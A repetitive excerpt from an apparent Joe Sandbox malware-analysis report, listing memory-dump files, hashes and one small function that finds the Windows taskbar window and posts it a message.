                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 2112e0d72762299eaa31852d96640731d72c2f59593f9626c300b25e3c73e3b3
                          • Instruction ID: 4447a6157720c842ee4564a6979a53bec0e4e30a6dc8f237d66be5c7e8069ddb
                          • Opcode Fuzzy Hash: 2112e0d72762299eaa31852d96640731d72c2f59593f9626c300b25e3c73e3b3
                          • Instruction Fuzzy Hash: 77D0C976388318B7E664A7709C4BFD66B94AB14B11F05096A724AAA1E0CDE0A900C764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B684C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B684DF
                          • PostMessageW.USER32(00000000), ref: 00B684E6
                            • Part of subcall function 00B48355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B483CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: c227228546790065829adacc9dfc2c91bb7e1d8e6d1fed3be23bfe9c5f8b2304
                          • Instruction ID: d975af9c751f76151d52267597b994081f3c274ed49185d27029440cdb078834
                          • Opcode Fuzzy Hash: c227228546790065829adacc9dfc2c91bb7e1d8e6d1fed3be23bfe9c5f8b2304
                          • Instruction Fuzzy Hash: 4FD0C972384318BBE665A7709C4BFD66794AB18B11F05096A724AAA1E0CDE0B900C764
                          Uniqueness

                          Uniqueness Score: -1.00%